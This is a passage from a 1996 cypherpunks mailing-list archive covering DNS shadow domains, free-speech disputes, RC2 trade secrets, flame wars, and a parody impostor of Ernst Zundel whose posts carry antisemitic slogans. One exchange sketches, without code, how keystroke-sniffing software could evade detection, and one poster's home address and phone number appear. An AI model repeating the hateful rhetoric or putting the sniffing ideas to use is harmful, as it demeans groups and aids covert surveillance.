was a minor rebellion among the internet service providers this fall when 
the NIC
announced that they would begin charging for their services and it flares 
up every now
and then when some of the larger independant ISPs begin to feel that the 
NIC is favoring
the major players like MCI, Sprint, et al. when it comes to address and 
routing blocks
and other name/IP number issues.  The point that is frequently raised to 
keep the NIC
in line is that there is nothing preventing these providers from going 
out and doing
whatever they want, whether it be establishing new root servers, 
allocating whatever
numbers they want, or just plain ignoring that the NIC exists.  And there 
would be
absolutely nothing that InterNIC could do about it, because that is how 
DNS works. The
biggest problems that would occur would be when there was a conflict in 
the namespaces
served (e.g. your lookup for www.foo.com returns one number when a 
InterNIC served
root nameserver responds and another when a different set of root 
nameservers respond)
and the number that would be returned would depend entirely on which 
nameservers your
query asked to get the answer.  In short, it would depend on who you 
decided to trust...

On a more cypherpunk-related note, it is actually quite trivial for you 
to create your
own shadow domains which are completely private to whatever group you 
want.  If you
want to create the foo.cypherpunk domain you can do it just by 
downloading the BIND
nameserver code and settting up a nameserver which answers queries for 
the top-level
.cypherpunk domain.  All that is required for someone else to resolve 
names in this
set of domains is for them to know that a .cypherpunk address needs to be 
resolved
by the nameserver you created (which involves adding only a single line 
in every DNS 
config system that I know of.)  It is also difficult for any authority to 
mandate 
that certain nameservers be used because the entire system is already so 
distributed 
as to make such a mandate useless (it would also cause such a performance 
hit for 
net connections that it would be about as effective as the old 55mph 
federal speed 
limits :)

jim
--
Jim McCoy
mccoy@communities.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 4 Feb 1996 13:46:35 +0800
To: cypherpunks@toad.com
Subject: Re: free speach and the government
Message-ID: <9602040531.AA20987@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


dlv@bwalk.dm.com (Dr. Dimitri Vulis) writes:

>Eric Murray <ericm@lne.com> writes:
>> Stephan Mohr writes:

>I believe that any exception to unlimited free speech, be it libel, or
>copyright violation, or child pornography, or Nazi propaganda, or Chinese
>dissident materials, just isn't compatible with the cpunk agenda. No censorship
>is acceptable. That's an absolute.

     I agree with that.  Principles are important.  I agree that Sarin reciepes might
be dangerous.  I also agree that such information should not be broadcasted.  
But I think that this control should be effected by the individual poster, out of 
benevolence for Man, not enforced at the point of a gun by a govt that pretends 
that we are to dumb to act by ourselves.  The nature of the Internet is 
unique in the history of mankind.  We must adapt, *as individuals* not as "a society".

The collectivity is a statistical concept that have no existence, apart in the 
pretensions of the collectivists do-gooders.



>There's a widespread misconception that most journalists support freedom of
>speech for non-journalists. I deal with journalists occasionally, and my
>impression is that the attitude of some of them can be summarized as follows:
>"I'm an important guy because I can say something that hundreds of thousands of
>people will see/read; and I can libel another person and s/he won't be able to
>respond". People with this attitude are very threatened by the Internet. I'm
>not saying that all journalists are this way; I'm just pointing out that it's
>foolish to assume that just because a person works in the media, s/he's in
>favor of free speech, especially unlimited free speech.

I think it is safe to say, especially regarding coverage of the Internet by
popular medias, that even if there are some journalists that still have integrity,
most of their bosses don't.


>From the technology point of view, there's no difference between helping
>Chinese dissidents circumvent their government's restrictions on the net,
>and helping neo-Nazis in Germany and helping child pornographers in the
>U.S. No one can determine which of the countless bits of information that
>travel over the Internet every second are false, or harmful, or subversive,
>or otherwise not worthy of transnmission.

Well,  here I don't completely agree.  *you* can determine what is worth and 
what is not.
But again, I suppose that if you have rationnal arguments, you will be able
to convince other rationnal individuals.  I am not in favor of broadcasting 
neo-nazi scum all over because I think that their essence is the same as the one
underlying the censorship movement.  They share the same vision of man, only the
flavor change slightly.  OTOH, somebody presenting facts pertaining to nazism and
what happened to the jews (confirming or infirming) are acceptable, as long as 
they are *facts*.  But there are plenty of causes that seems worthwhile
to defends, so why pick up the mosts dubious?


Ciao

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 4 Feb 1996 08:33:35 +0800
To: cypherpunks@toad.com
Subject: Ok Fake E.E.rnst!
Message-ID: <199602040011.BAA13348@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>From: Cecelia A Clancy <cacst9+@pitt.edu>
>Subject: Ok Fake Ernst!

>In-Reply-To: 
><9602031850.AA18675@frumious-bandersnatch.MIT.EDU>


Ho -- bandersnatch is powered up again and transmitting via the 
pigeon-beshitten attic-lattice of MIT dome!


PCB-swilling frumious, the cronkest of Hasse-heads, 23 years 
hacking a b.s.e.e.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joseph@genome.wi.mit.edu (Joseph Sokol-Margolis)
Date: Sun, 4 Feb 1996 14:59:18 +0800
To: hoel@eng.usf.edu
Subject: Re:  THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <9602040642.AA19600@karlo>
MIME-Version: 1.0
Content-Type: text/plain


what the hell was that? Surley you can't expect us to belive people wrote that?
--Joseph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 3 Feb 1996 23:41:15 +0800
To: bugtraq@fc.net
Subject: (fwd) National Security Agency
Message-ID: <199602031526.CAA11269@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


Path: news.aus.world.net!suburbia.net!proff
From: proff@suburbia.net (Julian Assange)
Newsgroups: alt.anagrams
Subject: National Security Agency
Date: 3 Feb 1996 10:50:30 GMT
Organization: AUSNet Services pty. ltd.
Lines: 21
Message-ID: <4evelm$b9n@sydney1.world.net>
NNTP-Posting-Host: suburbia.net
X-Newsreader: TIN [version 1.2 PL2]

National Anti-Secrecy Guy
Secret Analytic Guy Union
Caution Laying Any Secret
Run anti Social Agency Yet
Uncle gay, Insane Atrocity
Insane, ugly, acne atrocity
Your testical, again Nancy?
Acute yearly sactioning 
Yes, gain unclean atrocity.
Nuns age angelic atrocity

National Gay Secrecy Unit

ftp://suburbia.net/pub/electron/gan.tgz

--
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+

--
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 4 Feb 1996 21:24:18 +0800
To: "baldwin" (Robert W. Baldwin) <baldwin@rsa.com>
Subject: Re: RC2 technical questions
In-Reply-To: <9601028232.AA823283956@snail.rsa.com>
Message-ID: <199602040753.CAA27660@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


baldwin@rsa.com writes:
>         In a shameless attempt to move the discussion of RC2 into
> a more technical arena, here are some interesting questions to
> explore about RC2.
>                 --Bob
> 
> Key expansion
> - How can you tell whether the permutation is based on
>   some sequence of digits from PI?

[long list of other good and interesting questions deleted]

In a previous message, baldwin@rsa.com also wrote:
>WARNING NOTICE
...
>in such source code under applicable law, including without
>limitation trade secret and copyright protection.  In
>particular, RSA Data Security's RC2 (TM) symmetric block
>cipher source code has been illegally misappropriated and
>published.  Please be advised that these acts, as well as
>any retransmission or use of this source code, is a
>violation of trade secret, copyright and various other state
>and federal laws.  Any person or entity that acquires,
>discloses or uses this information without authorization or
>license to do so from RSA Data Security, Inc. is in
>violation of such laws and subject to applicable criminal
>and civil penalties, which may include monetary and punitive
>damages, payment of RSA's attorneys fees and other equitable
>relief.


Bob,

I'm confused by these two messages, as a non-lawyer (but I realize you're
also a non-lawyer).  How can RSADSI, on the one hand, expect to be able
to assert trade secret status over RC2 (with a warning to "...any person
who acquires, discloses or uses this information...") while at the same time
encouraging the world to examine and better understand the (illegally-
published) RC2 code?  To my lay mind, I cannot see how one can reconcile
your two messages.

I'm not trying to be cute or play lawyer.  I'm honestly confused as
to just what RSADSI's position here is.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: K00l Secrets <secret@secret.alias.net>
Date: Sun, 4 Feb 1996 18:26:56 +0800
To: bootboy@airmail.net
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960203124656_311380557@emout09.mail.aol.com>
Message-ID: <199602041005.EAA06068@paulsdesk.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <960203124656_311380557@emout09.mail.aol.com> ErnstZundl@aol.com writes:
> Instead, you can help me in my cause to make the Earth safe for White
> children.
> You can help me by joining me and my legions of Aryan Nazi UFO Supermen
> at the center of the Earth.  All you have to do to get there is enter the
> Earth's center by way of a volcano in Antarctica.
> 
> If you are a *true* Patriot, and a *true* Aryan, then you *MUST*
> make the journey to Antarctica and into the volcano!!  We owe it to
> the world, we owe it to the great Adolph Hitler, and we owe it to
> the White Race.
> 
> And please bring a sweater.  It's cold!

Is this guy really a Nazi, or just a complete nut?  I mean, if he's
out there convincing Neo-Nazis and Holocaust deniers to go freeze to
death at the South pole, as that really anti-semitic?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sun, 4 Feb 1996 17:53:34 +0800
To: llurch@networking.stanford.edu
Subject: Re: Sometimes ya just gotta nuke em
Message-ID: <Pine.BSD.3.91.960204043412.13565C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Rich, 
 
 
  Neither dropping nuclear weapons on Japanese cities nor an invasion 
  of Japan was necessary to secure surrender of the Japanese government. 
 
  David Kahn explains: 
 
    Communications intelligence contributed...in major ways to the 
    Allies' Pacific victory.  It stepped up American submarine sinkings 
    of the Japanese merchant fleet by one third. This cutting of Japan's 
    lifelines was, Premier Hideki Tojo said after the war, one of the 
    major factors that defeated Japan. 
 
       David Kahn.  "Codebreaking in World Wars I and II: The 
       Major Successes and Failures, Their Causes and Their 
       Effects" (1980).  In: Kahn on Codes: Secrets of the New 
       Cryptology.  Macmillan Publishing Co.  1983.  Page 108. 
 
 
    The water transport intercepts should provide case after case of how 
    American submarines won one of the most important victories in the 
    Pacific: the sinking of the Japanese merchant fleet.... 
 
       Kahn.  "Opportunities in Cryptology for Historians."  Op 
       cit.  P 289. 
  
 
    Some information came out shortly after World War II, when we 
    all heard about how we broke some Japanese codes before Pearl 
    Harbor, which...did help very much...in the successful American 
    submarine blockade of Japan, which very largely brought the Jap- 
    anese empire to its knees. 
 
       Kahn.  "Signals Intelligence in the 1980s" (1981).  Op cit. 
       P 292. 
 
   
 
             In other words, it was Starvation City. 
             --------------------------------------- 
 
  As an aside. these three quotations from Kahn on Codes, a collection 
  of articles, show that David's views in this regard are consistent 
  over the years. 
 
  Continuing-- 
 
  Dropping nuclear weapons on Japanese cities or an invasion of Japan 
  was not necessary to secure surrender of the Japanese government. 
   
  William Langer explains: 
 
    In the greatest air offensive in history [during May, June, and 
    July 1945] United States land-based and carrier-based aircraft des- 
    troyed or immobilized the remnants of the Japanese navy, shattered 
    Japanese industry, and curtailed Japanese sea communications by sub- 
    marine and air attack and extensive minefields.  United States bat- 
    tleships moved in to shell densely populated cities with impunity 
    and the Twentieth Air Force dropped 40,000 tons of bombs on Japanese 
    industrial centers in one month. 
 
       William Langer.  An Encyclopedia of World History. 
       Houghton Mifflin Co.  1948.  Page 1169. 

 
                    It was Devastation City. 
                    ------------------------ 

  Then why Hiroshima and Nagasaki? 
 
  There were two main reasons nuclear weapons were dropped on Japanese 
  cities: 
 
       (1)  generally, to proclaim Pax Americana...with a bang 
 
       (2)  specifically, to declare war on the Soviet Union. 
 
 
  For the sake of completeness, let's ask:  If it really had been 
  necessary to drop nuclear weapons on Japan in order to compel the 
  Japanese government to surrender, should they have been dropped? 
 
  Without hesitation. 
 
 
  Cordially, 
 
  Jim 
 
 

 
  NOTE.  The first part of the "Opportunities" article was published 
  in 1972.  The second part, dealing with World War II, was written 
  perhaps a decade later for publication in the collection. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paralax@alpha.c2.org
Date: Sun, 4 Feb 1996 21:28:37 +0800
To: cypherpunks@toad.com
Subject: Nuke em if ya got em "TCMay"
Message-ID: <199602041303.FAA05924@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Date: Sat, 03 Feb 1996 22:20:52 -0800 James A. Donald Wrote:

At 03:39 PM 2/3/96 -0800, paralax@alpha.c2.org wrote:

P> Mr. Hayes MAY have used a condescending tone but you have exposed your
P> racist roots again.  First you embarrass yourself with you lack of knowledge,

JAD> Paralax does not know shit from beans.  He presumably imagines that Tim is
JAD> "embarrassed" because Tim's knowledge of the historical facts differs from
JAD> those facts dreamed up by the usual crew of apologists for totalitarian terror.

JAD> James A. Donald

Historical facts and or personal interpretations thereof were never called in to question by me.  I took umbrage with Mr. May's insulting, insensitive and racist comments about Jews and the Japanese.  Whether Mr. May's is personally embarrassed by his public display of ignorance and bigotry matters not.  He did indeed embarrass himself on an 'International Stage'.

I may not know shit from beans (actually I do) but I do know cultural  insensitivity, racism, bigotry and ignorance when I see it displayed so blatantly.  I encouraged Mr.
May to return to topics 'cipher' before further embarrassment ensues.  I urge you to do
likewise.

A. Paralax View




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paralax@alpha.c2.org
Date: Sun, 4 Feb 1996 22:53:22 +0800
To: cypherpunks@toad.com
Subject: Aegis PGP Shell
Message-ID: <199602041406.GAA11463@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Gordon Campbell wrote: 

GRC> After doing a total reinstall of my system (don't ask) I discovered that I
GRC> don't have a copy of the Aegis PGP Shell distribution archive anywhere. I
GRC> attempted to grab it from http://iquest.com/~aegisrc as listed in the docs,
GRC> but the site doesn't exist.

GRC> Doesn anybody know what gives and where I can get a new copy of the archive?
GRC> I really like this shell and haven't figured out how to otherwise integrate
GRC> PGP with EudoraPro.

GRC> Gordon R. Campbell, Owner - Mowat Woods Graphics

>From alt.security.pgp another reader writes:

> It seems that iquest.com has dropped off the net today so the 
> normal url:  http://iquest.com/~aegisrc/beta2.htm is 
> unavailable.  With the weather around here right now, I doubt 
> it will be up any time soon.

> I've created a very quick mirror site at:
> http://fly.hiwaay.net/~lyman/pgpwsbeta.htm

> Please use it only if you cannot connect to the first url.

A. Paralax View




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 4 Feb 1996 19:53:43 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
Message-ID: <2.2.32.19960204113951.009bca04@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:01 PM 2/3/96 -0800, Timothy C. May wrote:
>presence by Lewis. (From what I've seen at California universities, the
>folks with the long knives will still be trying to "get him."
>Unfortunately, with search tools like Alta Vista they can keep tabs on him
>semi-automatically and report any further evidence of his racist,
>mysogynistic, and anti-democratic views to the Dean of Students.)
>
>(I could add a smiley here, but it's really not very funny.)

But it's a state school.  All you have to do is sue.  Since academics are
gutless, they aren't that hard to face down.  So far, no one's really wanted
to face my mouth so they've left me alone once I made it clear that I was a
libertarian anarchist nut.

I feel sorry for Lewis though and wouldn't want him to do anything he wasn't
comfortable with.

DCF

"Then there was the time that my RA (Resident Assistant) in my dorm in a
small (private) liberal arts college in the Northwest found out I had a gun
in my room..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bernardo@alpha.c2.org
Date: Sun, 4 Feb 1996 23:56:06 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] Re: Charter of PDX Cpunk meetings
Message-ID: <199602041518.HAA17608@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:

>> I think an explanation for this is due.  Jim is going to move his complaints
>> here instead of dealing with them with me no matter what I do...
>
> Alan Olsen is correct, here.

This is childish and pointless.  Please shut up or take it to email.

> But he (the anonymous poster):
> 1.  FLamed me on this national list, similarly to the way Alan Olsen later did.

FWIW, this is an _international_ list with a lot of people who are
just not interested in your petty bickering.  If you want to argue
about this, please do it in private.  If Alan posts responses to the
list, that's his problem.  You don't _have_ to answer in public.

> 2.  Failed to be willing to sustain the debate in a more appropriate list, 
> even under a stable nym.

You have something against anonymity?  In this case, perhaps this list
is not the best place to be.

> that I had been flamed by that anonymous poster.  The fact that he was
> anonymous says it all.  The fact that he has not returned says it all.  The 

The fact that he was anonymous says nothing whatsoever.  So what if
you received some email agreeing that you'd been flamed?

> the fact that I am relatively new here.  I have no intention of inflicting
> an unwelcome discussion of "Assassination Politics" on the list, and 

Actually, and Perry may disagree here, but I'd have no objection to a
discussion of "Assassination Politics", or any other nutty political
theories, as long as we can stick to reasonably mature discussion and
not flames and petty ego boosting.

> suffered any longterm loss of reputation of his own.  I, on the other hand, 
> use my REAL NAME.

Whoopie!  A True Name!  Big deal.  I care not one jot whether or not
you use your REAL NAME.  I have no way of knowing if it is, in fact,
your real name.  Should it make a difference?

No one is going to "suffer any longterm loss of reputation" by
disagreeing with you, or anyone else, whether or not they use a nym
(or anonymity).

> Only a fool would have taken an anonymous flamer seriously under those 
> circumstances.

An anonymous post is no less valid for being anonymous.  The only
advantage of a stable nym, whether or not it's a True Name, is the
ability to gain (or lose) reputation through the content of its
posts.  Perhaps a nym with some reputation is taken more seriously
than an anonymous poster, but so is an unknown nym.  Neither you nor
Alan has any reputation to speak of (to me, at least), so an anonymous
post has no less.

>> Jim ignored that request and I removed him from the list.
> 
> Read:  "Alan Olsen exercised his authority in his own personal fiefdom, the 
> "PDX Cypherpunks list."

Are you saying he doesn't have that right?  If it's his list, he can
do whatever the hell he likes with it.

> On the contrary, I have no interest in dealing with this sleazy character in 
> email.  He was the one who chose a national list to do his flaming and 
> baiting, and I think he deserves full "credit."

In other words, you are not interested in resolving any problem you
have with Alan, you just to make a lot of noise in public in an
attempt to "embarrass" him.  Go play on some other list where this
kind of thing is appreciated.

>> The following is the last I will say publically on the matter.
> 
> You're going to take your bat and ball and "go thwait home!"  You hear your 
> mommy calling, Alan.

This list periodically devolves into this childishness.  I'm glad Alan
is not going to say any more.  I award Alan 20 Reputation Points for
being mature enough to walk away (delayed long enough to see whether
he does)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 4 Feb 1996 21:30:00 +0800
To: secret@secret.alias.net>
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960203124656_311380557@emout09.mail.aol.com>
Message-ID: <kl5=4RC00bkQAs7Lht@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 4-Feb-96 Re: THE JEWS (ALL of
them!).. by K00l Secrets@secret.alia 
>  
> Is this guy really a Nazi, or just a complete nut?  I mean, if he's
> out there convincing Neo-Nazis and Holocaust deniers to go freeze to
> death at the South pole, as that really anti-semitic?

Ernst Zundel is indeed a National Socialist. But as others pointed out
in previous messages, his real email address is ezundel@cts.com. I
posted a message to fight-censorship last week on the emergence of the
Zundelimposter. It's archived at the remaining CMU mirror site, at:

http://www.gsia.cmu.edu:80/andrew/ml3e/www/Not_By_Me_Not_My_Views/censorship/im
poster.012896.txt

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ErnstZundl@aol.com
Date: Sun, 4 Feb 1996 22:18:28 +0800
To: hoel@eng.usf.edu
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <960204084744_135434288@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Surley you can't expect us to belive people wrote that?

Who do you propose wrote it then?  Aryan Space Nazis?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ErnstZundl@aol.com
Date: Sun, 4 Feb 1996 22:10:09 +0800
To: bootboy@airmail.net
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <960204084755_135434252@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>> if he's out there convincing Neo-Nazis and Holocaust deniers >> to go
freeze to death at the South pole, as that really
>> anti-semitic?

DUH!!

Nobody is going to freeze to death if they dress warmly.  That is just a myth
about Antarctica.  It is really a tropical paradise, but THE JEWS don't want
you to know that.  Besides, we will all be going *inside* a VOLCANO!  Even if
somehow Antarctica were freezing cold, we will be plenty warm inside the
volcano which leads to the Aryan Nazi UFO Base at the center of the Earth.

I am not asking Nazis and Holocaust deniers to freeze to death!  I am
inviting them to jump into a volcano, you fool!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 4 Feb 1996 22:30:37 +0800
To: jamie@voyager.net
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960204084755_135434252@emout04.mail.aol.com>
Message-ID: <Yl5=yVi00bkQ4s7LED@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from request: 4-Feb-96 Re: THE JEWS (ALL of them!).. by
ErnstZundl@aol.com 
> Nobody is going to freeze to death if they dress warmly.  That is just a myth
> about Antarctica.  It is really a tropical paradise, but THE JEWS don't want
> you to know that.  Besides, we will all be going *inside* a VOLCANO!  Even if
> somehow Antarctica were freezing cold, we will be plenty warm inside the
> volcano which leads to the Aryan Nazi UFO Base at the center of the Earth.
>  
> I am not asking Nazis and Holocaust deniers to freeze to death!  I am
> inviting them to jump into a volcano, you fool!

The ernstzundl@aol.com imposter obviously does not know that Xenu will
chain him to an Antarctic volcano and annihilate him with nuclear
weapons. Beware the thetans!

ObCrypto: Obviously someone as controversial as Zundel needs to PGP-sign
his messages. (Actually, *her* messages, since Ingrid posts for the
Zundelish One.) Does anyone want to show her how to use PGP? I think she
has a PPP connection from her computer at home to cts.com. Message
headers don't indicate what mailer she uses.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: simsong@vineyard.net (Simson L. Garfinkel)
Date: Mon, 5 Feb 1996 10:56:33 +0800
To: nit@chron.com
Subject: Re: FV's blatant double standards
Message-ID: <v02130506ad3a7327a3d1@[204.17.195.43]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:18 AM 1/31/96, Rishab Aiyer Ghosh wrote:
>FV demonstrated, through it's "card sharp" or whatever, that
>real-time transactions are vulnerable to sniffers on the recipient's
>own machine. Of course. We all knew that. But the mistake is to
>assume that FV isn't _equally_ vulnerable to that threat. If you
>can write a trojan that will somehow get privileged access to my
>machine, trap my keystrokes, and identify my credit card number,
>you can certainly write one that will, sitting on my machine:
>    "intercept the user's electronic mail, read the confirmation
>    message from First Virtual's computers, and send out a fraudulent
>    reply"
>(to quote from Simson's article). Simson further quotes FV's Lee
>Stein: "A single user can be targeted, Stein said, but ''it is very
>difficult. . . . There are too many packets moving . . . to too many
>different machines.''" - which is of course equally true for real-time
>Netscape transactions.

Oh, I think that such a program can be written. However, it would be much
harder to get right, considering all of the different ways that people read
e-mail.


=============
Simson's Schedule:

Feb 2 - Feb 5 - Cambridge: Conference on Freely Redistributable Software
Feb 7 - Feb 13 - Baltimore: American Association for the Advancement of
Science.
Feb. 28 - March 1 - Seybold, Boston.
March 23 - NYC. MacFair.
March 27 - March 30: Cambridge. Computers, Freedom and Privacy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 4 Feb 1996 23:45:16 +0800
To: cypherpunks@toad.com
Subject: Re: free speach and the government
In-Reply-To: <9602040531.AA20987@cti02.citenet.net>
Message-ID: <TH5RiD45w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


(Little crypto relevance, some technology)

jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada)) writes:
>
> I think it is safe to say, especially regarding coverage of the Internet by
> popular medias, that even if there are some journalists that still have integrity
> most of their bosses don't.

They may have integrity; they just adhere to different moral principles.
E.g., if their salaries are paid by the advertisers, they may feel that
they owe their allegiance to the advertisers, not the readers, and that
pleasing the advertisers is more important than telling the (whole) truth.

> >U.S. No one can determine which of the countless bits of information that
> >travel over the Internet every second are false, or harmful, or subversive,
> >or otherwise not worthy of transnmission.
>
> Well,  here I don't completely agree.  *you* can determine what is worth and
> what is not.

I can determine what's not worth reading for me. (I wish I had better technical
means to filter out the incoming traffic that I know is not worth my reading --
freedom of non-association, in addition to freedom of speech and freedom of
association :-). I could share my opinions with others (through a rating system
or by publicly urging everyone to *plonk* someone I don't like, although I find
this in bad taste). I can't determine that an item is so unworthy that it
should be suppressed and that someone else should be deprived of his right
to read it. In my opinion, I can't determine that a certain item of information
is not worth being published/transmitted at all. Someone else is likely to
be interested in the information that I'm not interested in.

> But again, I suppose that if you have rationnal arguments, you will be able
> to convince other rationnal individuals.  I am not in favor of broadcasting
> neo-nazi scum all over because I think that their essence is the same as the
> underlying the censorship movement.  They share the same vision of man, only

Frankly, I've never looked at the stuff the WC is trying to suppress. I know
enough on the subject to be convinced that it's not worth my time and effort.
But if someone wants to publish it, and someone else wishes to read what they
publish, they should be at liberty to do that. I don't think they're the same
as the WC's, who seek to suppress speech.

As for pciking a more popular cause for a test case, yes, I wish there was
something more savory (like PRC or SG dissidents), but "popular speech doesn't
need protection".

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Mon, 5 Feb 1996 03:33:44 +0800
To: "A. Padgett Peterson, P.E. Information Security" <dcrocker@brandenburg.com
Subject: RE: Don't type your yes/fraud response into your computer
Message-ID: <2.2.32.19960204182512.0071a52c@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 AM 2/4/96 -0500, A. Padgett Peterson, P.E. Information Security wrote:
>OTOH, keyboard sniffing software is easy to detect because it must go 
>resident and it must intercept the keystrokes. The fact that no software
>has bothered to do this does not mean that it cannot be done. The 
>easiest way for such software to act would be to ignore the machine software
>and when sensitive material is to be passed, to do so via direct port 
>(hardware) access - been a while since I looked at it but AFAIR is around
>port 60h. (PC type machines)
>
>This would take care of anything sitting on Int 09 or Int 16 since it would
>be bypassed. Often a problem that looks difficult when viewed as a whole
>becomes simple once you disassemble it.

Nice try - but the virtual machine model used by intel supports interception
of I/O operations.  Now one could get into timing how long the I/O takes to
detect interception by the memory manager but it would be a royal pain since
the keyboard I/O controller latency is rather machine specific.

I still think the basic 'if the machine is not secure all bets are off'
premis stands.





--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Mon, 5 Feb 1996 00:14:57 +0800
To: cypherpunks@toad.com
Subject: Encryption Programs
Message-ID: <199602041551.KAA26343@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


OBVIOUSLY the spokesman of the group. I ask for help and this is what I get?

        One more time, I'm well aware of the capabilities of PGP. What I'm
looking for is a program
that does a better job of binary encryption than just Radix 64 ASCII armoring.


>Return-Path: remailer@utopia.hacktic.nl
>Date: Sun, 4 Feb 1996 10:40:07 +0100
>To: avatar@mindspring.com
>From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
>Organization: Hack-Tic International, Inc.
>XComm: This message was automaticly Remailed by an Anonymous Remailer.
>XComm: Report inappropriate use to <postmaster@utopia.hacktic.nl>
>Subject: Encryption Programs
>From: House.of.the.Rising.Sun@utopia.hacktic.nl
>
>
>	wow, a fresh newbie with his first toy!  your lights work, too?
>    cypherpunks is not for you if you need to ask for encryption....
>
>	there's only one encryption program which is both simple and
>    effective: PGP.  if you don't know where to find it, use DEC's Alta
>    Vista web search engine in advanced mode for "mit NEAR pgp"
>
>	you can get a DOS image. there are some windows interfaces I
>    have been told, but fuck Bill Gates and horse he rode in on.
>
>	maybe some day, you'll find enlightenment on choice of operating
>    systems...  instead of following the herd to Gate's bank of mindless.
>
>
>>From avatar@mindspring.comSun Feb  4 09:06:32 1996
>Date: Sat, 03 Feb 1996 23:17:09 -0600
>From: avatar@mindspring.com
>To: cypherpunks@toad.com
>Subject: Searching for the best
>
>Hi, Folks
>
>        I am looking for the best file encryption program and the best file
>wiping program.
>PC compatible, perferably Win 95 compatible.
>                                                                        Thanx
>Charles Donald Smith Jr.
>582 Clifton Rd. N.E.
>Atlanta, Ga. 30307-1787
>(404)-378-7282
>
>REPUBLICAN; smaller government, less taxes, richer people, and proud
children!! 
>
>
Charles Donald Smith Jr.
582 Clifton Rd. N.E.
Atlanta, Ga. 30307-1787
(404)-378-7282

REPUBLICAN; smaller government, less taxes, richer people, and proud children!! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 5 Feb 1996 03:48:31 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: RC2 technical questions
In-Reply-To: <199602040753.CAA27660@crypto.com>
Message-ID: <199602041859.KAA09877@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I'm confused by these two messages, as a non-lawyer (but I realize you're
> also a non-lawyer).  How can RSADSI, on the one hand, expect to be able

	Giving Bob the benefit of the doubt here, I'm assuming that he
passed on the legal warning as a service to his employer, but he made
his post talking about RC2's technical strengths as an individual, not
